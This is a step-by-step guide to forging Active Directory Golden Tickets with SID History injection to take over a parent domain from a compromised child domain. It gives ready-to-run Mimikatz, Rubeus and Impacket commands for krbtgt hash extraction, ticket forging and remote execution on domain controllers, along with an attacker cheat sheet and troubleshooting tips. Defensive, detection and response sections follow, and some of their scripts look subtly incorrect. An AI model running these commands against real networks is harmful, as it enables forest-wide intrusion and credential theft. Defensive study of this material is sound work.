Parent-Child Domain Trust Exploitation: The Complete Guide

📑 Table of Contents

• Introduction
• Attack Overview & Visualization
• The 5-Phase Attack Flow
• Real-World Scenarios
• Complete Command Reference
• Advanced Attack Vectors
• Defensive Countermeasures
• Detection & Monitoring
• Incident Response
• Conclusion

Introduction: Understanding the Threat

Active Directory (AD) is the backbone of enterprise IT infrastructure, managing identities and access for millions of organizations worldwide. Within an AD forest, domains are linked by trust relationships that enable seamless resource sharing and user authentication across domain boundaries. While these trusts are essential for operational efficiency, they represent a significant attack surface when not properly secured.

The parent-child domain trust relationship is particularly critical. These trusts are implicit, bidirectional, and transitive within a forest. A compromised child domain can serve as a launchpad for an attacker to escalate privileges and ultimately seize control of the entire AD forest, including all parent domains and the forest root.

One of the most potent techniques for this escalation is the Golden Ticket attack, which leverages a forged Kerberos Ticket-Granting Ticket (TGT) combined with SID History injection to grant an attacker unrestricted access to parent domain resources. This comprehensive guide provides a detailed methodology for understanding, executing, and defending against this attack.

ℹ️ Key Fact: An attacker with Domain Administrator access in a child domain can achieve Enterprise Admin access in the parent domain in under 15 minutes using the techniques described in this guide.

Attack Overview & Visualization

The Attack at a Glance

Phase	Action	Primary Tools	Expected Outcome	Time
1	Enumerate Domain Trusts	nltest, PowerView, Get-ADTrust	Confirm bidirectional trust with parent domain	5-10 min
2	Extract Child KRBTGT Hash	Mimikatz DCSync, Rubeus	Obtain NTLM hash of child domain's krbtgt account	3-5 min
3	Enumerate Parent EA SID	PowerView, Get-ADGroup	Identify Enterprise Admins SID in parent domain	3-5 min
4	Forge Golden Ticket	Mimikatz, Rubeus	Create forged TGT with EA SID in SID History	2-4 min
5	Access Parent Domain	Mimikatz, PsExec, WMI	Verify Enterprise Admin access on parent domain	2-4 min

Visual Representations

Figure 1: Attack Flowchart - Step-by-step decision tree showing the attack process from initial compromise to forest compromise

Figure 2: Forest Architecture - Illustrates a typical AD forest with multiple child domains and the attack path from child domain to full forest compromise

Figure 3: Attack Sequence Diagram - Shows the interaction between the attacker and domain controllers throughout the attack

The 5-Phase Attack Flow

Phase 1: Reconnaissance and Trust Enumeration (5-10 minutes)

Objective: Map domain trust relationships and identify the parent domain and forest root.

The first phase involves discovering the trust relationships within the Active Directory forest. This reconnaissance is critical to understanding the attack surface and identifying the parent domain that will be the target of the attack.

Using nltest (Built-in Windows Tool)

# Enumerate trusts for the current domain
nltest /domain_trusts

# Enumerate all trusts in the forest
nltest /domain_trusts /all_trusts

# Get detailed trust information
nltest /domain_trusts /verbose

# Test trust connectivity to a specific domain
nltest /domain_trusts /server:child-dc.child.globalcorp.local

Using PowerView (Advanced Enumeration)

# Import PowerView
. .\PowerView.ps1

# Get all trusts for the current domain
Get-DomainTrust

# Get all trusts within the forest
Get-NetForestTrust

# Get trusts for a specific domain
Get-DomainTrust -Domain globalcorp.local

# Get the SID of the current domain
Get-DomainSID

# Get the SID of a specific domain
Get-DomainSID -Domain globalcorp.local

Using Active Directory PowerShell Module

# Get all trusts for the current domain
Get-ADTrust -Filter *

# Get trusts for a specific domain
Get-ADTrust -Filter * -Server globalcorp.local

# Get detailed trust information
Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType, Transitive

✓ Phase 1 Complete When: You have confirmed the existence of a bidirectional trust relationship with the parent domain and identified the parent domain's DNS name.

---

Phase 2: Child Domain Credential Extraction (3-5 minutes)

Objective: Obtain the NTLM hash of the child domain's krbtgt account, which is the master key for forging Kerberos tickets.

The KRBTGT account is a special service account in Active Directory that is used to encrypt and sign all Kerberos Ticket-Granting Tickets (TGTs) issued by the domain. Obtaining its hash is the critical step that enables golden ticket creation.

Using Mimikatz DCSync

# Start Mimikatz (must be run as Administrator or SYSTEM)
mimikatz.exe

# Enable debug privileges
mimikatz # privilege::debug
Privilege '20' OK

# Perform DCSync to extract the krbtgt hash
mimikatz # lsadump::dcsync /domain:child.globalcorp.local /user:krbtgt

# Expected output:
# [DC] 'child.globalcorp.local' will be the domain
# [DC] 'child-dc.child.globalcorp.local' will be the DC server
# [DC] 'krbtgt' will be the user account
# 
# Credentials:
#   Hash NTLM: 38fb5559b8b79e3657cbf45f7165a0c5

Alternative: Extracting from LSA

# If DCSync is not available, try extracting from LSA on a Domain Controller
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

# This will dump all hashes including krbtgt

Using Impacket (Python Alternative)

# Use secretsdump.py from Impacket to extract hashes
python3 secretsdump.py -just-dc-user krbtgt child.globalcorp.local/Administrator:Password123@child-dc.child.globalcorp.local

# Expected output:
# child.globalcorp.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:38fb5559b8b79e3657cbf45f7165a0c5:::

✓ Phase 2 Complete When: You have successfully extracted the NTLM hash of the child domain's krbtgt account. This hash is typically in the format: 38fb5559b8b79e3657cbf45f7165a0c5

---

Phase 3: Parent Domain Information Gathering (3-5 minutes)

Objective: Identify the Security Identifier (SID) of the parent domain's "Enterprise Admins" group, which will be injected into the forged ticket.

The Enterprise Admins group is the highest privilege group in an Active Directory forest. By injecting this group's SID into the SID History field of a forged ticket, an attacker can impersonate an Enterprise Admin.

Using PowerView

# Get the SID of the parent domain
Get-DomainSID -Domain globalcorp.local
# Output: S-1-5-21-9876543210-9876543210-9876543210

# Get information about the Enterprise Admins group
Get-NetGroup -Domain globalcorp.local -GroupName "Enterprise Admins"
# Output includes: objectsid = S-1-5-21-9876543210-9876543210-9876543210-519

# Get all members of Enterprise Admins
Get-NetGroupMember -Domain globalcorp.local -GroupName "Enterprise Admins"

Using Active Directory PowerShell Module

# Get the SID of the Enterprise Admins group
(Get-ADGroup -Identity "Enterprise Admins" -Server globalcorp.local).SID.Value
# Output: S-1-5-21-9876543210-9876543210-9876543210-519

# Get members of Enterprise Admins
Get-ADGroupMember -Identity "Enterprise Admins" -Server globalcorp.local

# Get domain information
Get-ADDomain -Identity globalcorp.local

ℹ️ Important: The Enterprise Admins group always has RID 519. So if the parent domain SID is S-1-5-21-9876543210-9876543210-9876543210, the Enterprise Admins SID will be S-1-5-21-9876543210-9876543210-9876543210-519

✓ Phase 3 Complete When: You have identified the full SID of the parent domain's Enterprise Admins group in the format: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-519

---

Phase 4: Forging the Golden Ticket (2-4 minutes)

Objective: Create a forged Kerberos TGT with the parent domain's Enterprise Admins SID injected into the SID History attribute.

The golden ticket is a forged Kerberos TGT that is signed with the child domain's KRBTGT hash. By injecting the parent domain's Enterprise Admins SID into the SID History field, the attacker can impersonate an Enterprise Admin when accessing parent domain resources.

Using Mimikatz

# Forge the golden ticket with SID History injection
mimikatz # kerberos::golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /ptt

# Parameters explained:
# /user: Username to impersonate
# /domain: Child domain name
# /sid: Child domain SID
# /krbtgt: Child domain krbtgt NTLM hash
# /sids: Parent domain Enterprise Admins SID to inject into SID History
# /ptt: Pass-the-Ticket (inject directly into memory)

# Verify the ticket is in memory
mimikatz # kerberos::list

Using Rubeus

# Forge the golden ticket with Rubeus
Rubeus.exe golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /ptt

# Verify the ticket
Rubeus.exe triage

Saving the Ticket to a File

# Save with Mimikatz
mimikatz # kerberos::golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /outfile:golden_ticket.kirbi

# Save with Rubeus
Rubeus.exe golden /user:Administrator /domain:child.globalcorp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:38fb5559b8b79e3657cbf45f7165a0c5 /sids:S-1-5-21-9876543210-9876543210-9876543210-519 /outfile:golden_ticket.kirbi

✓ Phase 4 Complete When: The golden ticket has been successfully created and injected into memory. You should see the ticket listed when running kerberos::list or Rubeus.exe triage

---

Phase 5: Accessing the Parent Domain (2-4 minutes)

Objective: Use the forged ticket to access parent domain resources and confirm Enterprise Admin privileges.

With the golden ticket in memory, the attacker can now access any resource in the parent domain as if they were an Enterprise Admin. This is the final step that completes the forest compromise.

Direct Resource Access

# After injecting the golden ticket, access parent domain resources
dir \\globalcorp-dc.globalcorp.local\C$

# List the ADMIN$ share
dir \\globalcorp-dc.globalcorp.local\ADMIN$

# Access the SYSVOL share
dir \\globalcorp-dc.globalcorp.local\SYSVOL

Using PsExec for Remote Code Execution

# Get an interactive shell on the parent domain DC
PsExec.exe \\globalcorp-dc.globalcorp.local cmd.exe

# Execute a command on the parent DC
PsExec.exe \\globalcorp-dc.globalcorp.local whoami

# Copy a file to the parent DC
PsExec.exe \\globalcorp-dc.globalcorp.local copy C:\malware.exe \\globalcorp-dc\C$\Windows\Temp\

Using WMI for Remote Execution

# Execute a command using WMI
wmic /node:globalcorp-dc.globalcorp.local process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Get process information
wmic /node:globalcorp-dc.globalcorp.local process list

# Create a new process
wmic /node:globalcorp-dc.globalcorp.local process call create "powershell.exe -Command Get-Process"

✓ Phase 5 Complete When: You have successfully accessed parent domain resources and confirmed Enterprise Admin privileges. At this point, the entire forest is compromised.

Real-World Scenarios

Scenario 1: The "AcquiredCo" Nightmare

Context: A large, security-conscious corporation, "GlobalCorp," acquires a smaller, more agile startup, "InnovateNow." To integrate the companies, InnovateNow's domain (innovatenow.local) is made a child domain of GlobalCorp's forest root domain (globalcorp.local). InnovateNow has a more relaxed security posture, with developers having local admin rights on their workstations and some servers.

Initial Foothold: An attacker compromises a developer's machine at InnovateNow through a phishing attack, gaining a foothold in the innovatenow.local domain.

Exploitation Path:

1. Privilege Escalation within Child Domain: The attacker finds that the compromised developer account is a member of a group that has administrative rights on a development server. From this server, the attacker uses Mimikatz to dump credentials from memory and finds the credentials of a Domain Admin for innovatenow.local who had recently logged into the server.
2. Child Domain Dominance: With Domain Admin privileges in the innovatenow.local domain, the attacker now has the keys to the child kingdom.
3. Golden Ticket Attack: The attacker uses their DA privileges to perform a DCSync attack and retrieve the krbtgt hash for the innovatenow.local domain.
4. Parent Domain Reconnaissance: The attacker enumerates the parent domain (globalcorp.local) to find the SID of the "Enterprise Admins" group.
5. Forest Compromise: A golden ticket is forged using the child domain's krbtgt hash and the parent domain's Enterprise Admins SID. This ticket is then used to access and control resources in the globalcorp.local domain, leading to a full forest compromise.

Impact: The attacker now has complete control over the entire corporate network, including all domains, user accounts, and resources. They can exfiltrate sensitive data, deploy malware, or cause widespread disruption.

---

Scenario 2: The "BranchOffice" Breach

Context: A multinational corporation, "MegaCorp," has numerous branch offices, each with its own child domain. The london.megacorp.com child domain is managed by a local IT team that is understaffed and has not kept up with the latest security patches on their Domain Controllers.

Initial Foothold: An attacker exploits a known vulnerability, such as Zerologon (CVE-2020-1472), on a Domain Controller in the london.megacorp.com domain. This vulnerability allows for an instant escalation to Domain Admin.

Exploitation Path:

1. Instant DA: By exploiting Zerologon, the attacker resets the DC's machine account password to a known value, effectively gaining Domain Admin level privileges in the london.megacorp.com domain.
2. DCSync: With DA on the child DC, the attacker immediately has access to all domain secrets, including the krbtgt hash.
3. Cross-Domain Attack: The attacker then follows the standard procedure of enumerating the parent domain (megacorp.com), finding the Enterprise Admins SID, and forging a golden ticket to gain control of the entire forest.

Impact: The entire MegaCorp network is compromised in a matter of minutes. The attacker has access to all branch offices, headquarters, and all corporate resources.

---

Scenario 3: The Insider Threat

Context: A disgruntled system administrator at a subsidiary of a large conglomerate, "WorldWide Inc.", decides to escalate their privileges. The subsidiary has its own child domain, subsidiary.worldwide.inc.

Initial Foothold: The administrator already has Domain Admin privileges within the subsidiary.worldwide.inc domain as part of their job role.

Exploitation Path:

1. Abuse of Existing Privileges: The administrator, with their legitimate DA access, can directly proceed to the credential extraction phase.
2. KRBTGT Hash Extraction: The administrator uses their access to a DC in the child domain to run Mimikatz and extract the krbtgt hash.
3. Golden Ticket to the Kingdom: The administrator forges a golden ticket, adding the Enterprise Admins SID from the parent worldwide.inc domain. They can now operate with the highest level of privilege across the entire corporate network, exfiltrating data or causing disruption.

Impact: An insider threat with legitimate access escalates to full forest compromise, potentially exfiltrating sensitive corporate data or sabotaging critical systems.

Complete Command Reference

Quick Reference Cheat Sheet

# PHASE 1: Enumerate Trusts
nltest /domain_trusts
Get-DomainTrust
Get-ADTrust -Filter *

# PHASE 2: Extract KRBTGT Hash
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:child.local /user:krbtgt

# PHASE 3: Get Parent EA SID
Get-DomainSID -Domain parent.local
Get-NetGroup -Domain parent.local -GroupName "Enterprise Admins"
(Get-ADGroup -Identity "Enterprise Admins" -Server parent.local).SID.Value

# PHASE 4: Forge Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /krbtgt:HASH /sids:S-1-5-21-PARENT-SID-519 /ptt
Rubeus.exe golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /rc4:HASH /sids:S-1-5-21-PARENT-SID-519 /ptt

# PHASE 5: Access Parent Domain
dir \\parent-dc\C$
PsExec.exe \\parent-dc cmd.exe
wmic /node:parent-dc process call create "cmd.exe"

Troubleshooting Common Issues

Issue 1: "Access Denied" When Running DCSync

Problem: The user running Mimikatz does not have the necessary permissions to perform DCSync.

Solution:

# Ensure you're running as SYSTEM or with DA privileges
whoami /priv

# If not running as SYSTEM, use PsExec to spawn a SYSTEM shell
PsExec.exe -s cmd.exe

# Then run Mimikatz from the SYSTEM shell
C:\Windows\system32> mimikatz.exe

Issue 2: "The specified domain either does not exist or could not be contacted"

Problem: The parent domain is not reachable or the domain name is incorrect.

Solution:

# Verify the domain name
nltest /domain_trusts

# Check DNS resolution
nslookup globalcorp.local

# Ensure network connectivity to the parent domain
ping globalcorp-dc.globalcorp.local

Issue 3: Golden Ticket Not Being Accepted

Problem: The forged ticket is not being accepted by the parent domain.

Causes and Solutions:

• Incorrect SID: Verify the parent domain SID and Enterprise Admins RID (should be 519)
• Incorrect KRBTGT hash: Re-extract the krbtgt hash from the child domain
• Time synchronization: Ensure the attacker's machine clock is synchronized with the domain controllers

# Verify time synchronization
net time \\globalcorp-dc.globalcorp.local

# Resync time if necessary
net time \\globalcorp-dc.globalcorp.local /set

Advanced Attack Vectors

Forged Inter-Realm Trust Tickets

Instead of relying on SID History, an attacker can forge an inter-realm trust ticket. This technique is particularly useful when SID filtering is enabled, as it does not rely on the SID History attribute.

Process:

1. Extract the Inter-Realm Trust Key: The trust key is shared between the two domains and is used to sign referral tickets. It can be extracted using Mimikatz's lsadump::trust /patch command.
2. Forge the Trust Ticket: Using the extracted trust key, an attacker can forge a ticket that impersonates a user from the child domain, granting them access to resources in the parent domain.

# Extract the inter-realm trust key
mimikatz # lsadump::trust /patch

# Forge an inter-realm trust ticket
mimikatz # kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-CHILD-SID /krbtgt:TRUST-KEY /sids:S-1-5-21-PARENT-SID-519 /ptt

Exploiting Writable Configuration NC

The Configuration Naming Context (NC) is replicated to every DC in the forest and contains configuration information for the entire forest. If an attacker can gain SYSTEM-level access on a child DC, they may be able to write to the Configuration NC and compromise the entire forest.

Attack Examples:

• Linking a Malicious GPO: An attacker can link a malicious Group Policy Object (GPO) to a site that contains the parent domain's DCs, allowing them to execute code on those DCs.
• Compromising gMSA: An attacker can compromise a Group-Managed Service Account (gMSA) that has privileges in the parent domain.
• Schema Abuse: In rare cases, an attacker with the necessary permissions can modify the AD schema to grant themselves privileges.
• ADCS Exploitation: If Active Directory Certificate Services (ADCS) is misconfigured, an attacker can create or modify certificate templates to allow for authentication as any user, including Enterprise Admins.

Defensive Countermeasures

Prevention Strategies

1. Implementing SID Filtering

SID filtering is a critical control that prevents the abuse of SID History across domain boundaries. However, it is not enabled by default on intra-forest trusts, which is where this attack is most effective.

# Check current trust settings
Get-ADTrust -Filter * | Select-Object Name, TrustDirection, TrustType, TrustAttributes

# Enable SID filtering on an external trust
Set-ADTrust -Identity "external.com" -TrustAttributes "SIDFilteringQuarantinedDomain"

⚠️ Important Note: SID filtering cannot be enabled on intra-forest trusts without breaking functionality. Instead, focus on other preventative measures.

2. Implementing Tiered Administration (ESAE/Red Forest)

The Enhanced Security Admin Environment (ESAE), also known as the "Red Forest" architecture, isolates high-privilege accounts in a separate, hardened forest.

Key Components:

• Admin Forest: A separate, highly secured forest containing only administrative accounts and resources.
• Production Forests: User and business resource forests that are segregated from the admin forest.
• One-way Trust: A one-way trust from the production forest to the admin forest, allowing admins to manage production resources but preventing compromise of the admin forest from a compromised production forest.

3. Regular KRBTGT Password Reset

Resetting the KRBTGT password invalidates all existing Kerberos tickets, including any forged golden tickets.

# Reset the KRBTGT password (must be done twice, in sequence)
# First reset
Set-ADAccountPassword -Identity "krbtgt" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword1!" -Force) -Reset

# Wait 10 hours or replicate changes to all DCs

# Second reset (to invalidate any tickets created with the old password)
Set-ADAccountPassword -Identity "krbtgt" -NewPassword (ConvertTo-SecureString -AsPlainText "NewPassword2!" -Force) -Reset

# Verify the change
Get-ADUser -Identity "krbtgt" -Properties PasswordLastSet | Select-Object PasswordLastSet

ℹ️ Best Practice: Reset KRBTGT passwords quarterly or after suspected compromise.

4. Restricting DCSync Permissions

Limit which accounts can perform DCSync operations.

# Check who has DCSync permissions
Get-ADUser -Filter * -Properties nTSecurityDescriptor | Where-Object { $_.nTSecurityDescriptor -match "DS-Replication-Get-Changes" }

# Remove DCSync permissions from unnecessary accounts
$user = Get-ADUser -Identity "SuspiciousUser"
$acl = Get-Acl -Path "AD:\$($user.DistinguishedName)"
# (Remove the ACE for DS-Replication-Get-Changes)
Set-Acl -Path "AD:\$($user.DistinguishedName)" -AclObject $acl

Detection & Monitoring

Monitoring DCSync Attacks

Event Log Monitoring:

# Monitor for Directory Replication Service (DRS) events
# Event ID 4662: An operation was performed on an object
# Event ID 4624: An account was successfully logged on
# Event ID 4688: A new process has been created

# Search for suspicious DCSync activity
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4662
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object { $_.Message -match "DS-Replication-Get-Changes" }

# Look for Mimikatz DCSync commands
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4688
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object { $_.Message -match "mimikatz|lsadump" }

Detecting Golden Ticket Usage

Kerberos Ticket Analysis:

# Monitor for tickets with unusual lifetimes
# Golden tickets typically have a 10-year lifetime

# Event ID 4769: A Kerberos service ticket was requested
# Event ID 4770: A Kerberos service ticket was renewed
# Event ID 4771: Kerberos pre-authentication failed

# Search for suspicious ticket requests
Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    ID = 4769
    StartTime = (Get-Date).AddDays(-1)
} | Where-Object { $_.Message -match "Enterprise Admins" }

Behavioral Analysis and Anomaly Detection

Monitor for users from child domains accessing parent domain resources. This is typically unusual and should trigger alerts.

Example Alert: Alert if a user from child.globalcorp.local accesses resources in globalcorp.local

Using BloodHound for Proactive Detection

Use BloodHound to identify attack paths and potential vulnerabilities.

# Use BloodHound to identify attack paths
# 1. Collect data using SharpHound
# 2. Import into BloodHound
# 3. Query for "Shortest Path to Domain Admin"
# 4. Look for trust relationships that could be exploited

# Example BloodHound query (Cypher):
MATCH (u:User)-[:MemberOf*1..]->(g:Group)-[:AdminTo]->(c:Computer)-[:MemberOf*1..]->(g2:Group)-[:AdminTo]->(c2:Computer)
WHERE g.name CONTAINS "DOMAIN ADMINS" AND c.domain = "child.globalcorp.local" AND c2.domain = "globalcorp.local"
RETURN u, g, c, g2, c2

Incident Response

Detecting a Compromise

Indicators of Compromise (IOCs):

• Presence of Mimikatz or similar credential dumping tools
• Unusual DCSync activity
• Golden tickets in memory
• Unexpected cross-domain access
• Suspicious process creation (e.g., PsExec, WMI)

Immediate Response Steps

# 1. Isolate affected systems
# - Disconnect from network if necessary

# 2. Collect forensic evidence
# - Dump memory for analysis
# - Collect event logs
# - Preserve system state

# 3. Reset compromised credentials
# - Reset KRBTGT password (twice)
# - Reset all DA and EA passwords
# - Reset trust account passwords

# 4. Invalidate existing tickets
# - Restart all DCs to invalidate cached tickets
# - Or use Mimikatz to purge tickets from memory

# 5. Investigate the scope of compromise
# - Determine what resources were accessed
# - Identify all affected systems
# - Assess data exposure

Long-term Remediation

1. Patch all systems: Apply latest security patches and update all software
2. Review and strengthen controls: Implement SID filtering where possible, deploy ESAE/Red Forest architecture, implement PAWs for administrative access
3. Enhance monitoring: Deploy SIEM, implement behavioral analytics, set up real-time alerting
4. Conduct security training: Train administrators on security best practices, conduct phishing simulations, educate users on security awareness

Conclusion

The trust relationships that underpin Active Directory, while necessary for its operation, represent a significant attack surface. The exploitation of parent-child domain trusts is a well-established technique for privilege escalation, and as demonstrated in this guide, a determined attacker with initial access to a child domain has multiple pathways to compromise the entire forest.

The golden ticket attack with SID History injection is one of the most effective and dangerous techniques in an attacker's arsenal. It requires minimal technical sophistication once Domain Admin access is obtained in a child domain, and it can be executed in under 15 minutes.

Key Takeaways:

• Parent-child domain trusts are implicit, bidirectional, and transitive within a forest
• A compromised child domain can lead to full forest compromise
• The golden ticket attack is difficult to detect without proper monitoring
• Defense-in-depth strategies are essential to mitigate this threat
• Regular security assessments and monitoring are critical

Organizations must implement a robust defense-in-depth strategy, combining preventative measures, proactive detection, and rapid response capabilities. This includes implementing SID filtering where applicable, deploying ESAE/Red Forest architectures, regularly resetting KRBTGT passwords, restricting DCSync permissions, and maintaining comprehensive monitoring and alerting systems.

🛡️ Defense Summary:

• ✓ Implement SID filtering on external trusts
• ✓ Deploy ESAE/Red Forest architecture
• ✓ Reset KRBTGT passwords quarterly
• ✓ Restrict DCSync permissions
• ✓ Monitor for DCSync and golden ticket usage
• ✓ Implement behavioral analytics
• ✓ Use BloodHound for attack path analysis
• ✓ Maintain comprehensive logging and alerting

---

⚠️ DISCLAIMER: This guide is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before conducting security assessments or penetration tests. The techniques described herein should only be used by qualified security professionals in controlled environments with explicit permission. The author assumes no liability for misuse of this information.

↑ Back to Top